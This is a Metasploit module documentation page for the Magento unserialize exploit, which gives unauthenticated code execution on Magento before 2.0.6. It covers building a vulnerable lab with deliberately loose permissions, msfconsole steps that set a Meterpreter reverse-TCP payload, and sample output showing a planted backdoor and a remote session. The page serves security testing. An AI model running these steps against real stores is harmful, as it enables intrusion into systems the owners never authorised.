ContextQMD
Back to Metasploit Framework

Magento Unserialize

documentation/modules/exploit/multi/http/magento_unserialize.md

6.4.1314.8 KB
Original Source

Vulnerable Application

Magento is a popular open-source e-commerce platform written in PHP. An unserialization vulnerability exists in the product that allows an unauthenticated user to gain arbitrary code execution.

Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.

For testing purposes, you can download the vulnerable applications here.

Install

To set up a vulnerable version of Magento, please follow these steps. This is specific to Ubuntu 14, and assumes you are installing Magento under /var/www/html/.

  1. Set up a Ubuntu box.
  2. Open a terminal, and enter: sudo apt-get install apache2
  3. Enter: sudo apt-get install php5
  4. Enter: sudo a2enmod rewrite
  5. Add the following content to /etc/apache2/sites-enabled/000-default.conf, inside the virtual block:
<Directory /var/www/html>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride All
  Order allow,deny
  allow from all
</Directory>
  1. Download the vulnerable Magento app
  2. Extract the compressed file: tar -xf magento2-2.0.5.tar.gz
  3. Move the files and directories of magento2-2.0.5 to /var/www/html/ (make sure .htaccess is copied too)
  4. In terminal, enter: sudo chmod 644 /var/www/html/.htaccess
  5. Enter: sudo service apache2 restart
  6. Enter: sudo apt-get install mysql-server-5.6. And follow the installation instructions of MySQL.
  7. Enter: sudo apt-get install php5-mysql
  8. Enter: sudo apt-get install php5-mcrypt
  9. Enter: sudo php5enmod mcrypt
  10. Enter: sudo apt-get install php5-xsl php5-curl php5-intl
  11. Enter: sudo service apache2 restart
  12. cd to /var/www/html, enter: sudo mkdir tmp, and cd to tmp
  13. In tmp, do: curl -sS https://getcomposer.org/installer | php
  14. Enter: sudo mv composer /usr/local/bin/composer
  15. In /var/www/html, do: composer install
  16. You will be asked for a username (public key) and password (private key). You can register for one here: https://marketplace.magento.com/
  17. Back to terminal, enter: mysql -h localhost -u root -p[password]
  18. In mysql, enter: create database magento, and exit
  19. Go to http://localhost with a browser, and install Magento through the web interface.
  20. After installation, back to Magento directory, and enter: sudo rm -rf var/cache/*
  21. Enter: sudo rm -rf var/generation/*
  22. Enter: sudo rm -rf var/page_cache/*
  23. cd to /var/www/html/bin
  24. Enter: sudo php magento deploy:mode:set developer. It should say that you're in developer mode.
  25. Enter: sudo php magento setup:static-content:deploy
  26. Enter: sudo php magento indexer:reindex
  27. Enter: sudo chmod -R 777 /var/www/html
  28. Go to http://localhost, you should see Magento up and running.
  29. From Magento, log in as admin, and create a product. After creating one, make sure this product is:
    • Either includes a shipping address, or does not have a weight.
    • Searchable from the front-end.

If at some point the IP (base URL) of Magento has changed, then you will need to do these steps to update:

  1. From the terminal, do: mysql -h localhost -u [username] -p[password]
  2. In the SQL prompt, do: use [magento database name]
  3. Do: select * from core_config_data;, you should see both web/unsecure/base_url (config ID 2) and web/secure/base_url (config ID 3) with the hardcoded IP.
  4. Do: update core_config_data set value='http://[IP]/' where config_id=2;
  5. Do: update core_config_data set value='https://[IP]/' where config_id=3;
  6. Back to the Magento directory, do: sudo rm -rf var/cache/*
  7. Also do: sudo rm -rf var/generation/*
  8. Also do: sudo rm -rf var/page_cache/*
  9. Browse to Magento again with the new IP, it should be up and running again.

Verification Steps

  1. Start msfconsole
  2. Do: exploit/multi/http/magento_unserialize
  3. Do: set RHOST [IP]
  4. Do: set PAYLOAD php/meterpreter/reverse_tcp
  5. Do: set LHOST [IP]
  6. Do: exploit
  7. And you should get a session

Options

Scenarios

msf exploit(magento_unserialize) > check
[*] 192.168.1.108:80 The target appears to be vulnerable.
msf exploit(magento_unserialize) > exploit

[*] Started reverse TCP handler on 192.168.1.94:4444 
[+] 192.168.1.108:80 - generated a guest cart id
[+] 192.168.1.108:80 - backdoor done!
[*] Sending stage (33721 bytes) to 192.168.1.108
[*] Meterpreter session 6 opened (192.168.1.94:4444 -> 192.168.1.108:46835) at 2016-06-02 17:09:34 -0500
[+] 192.168.1.108:80 - Deleted lP5UgbUBLm1sWN25gWfZBqYKms.php

meterpreter >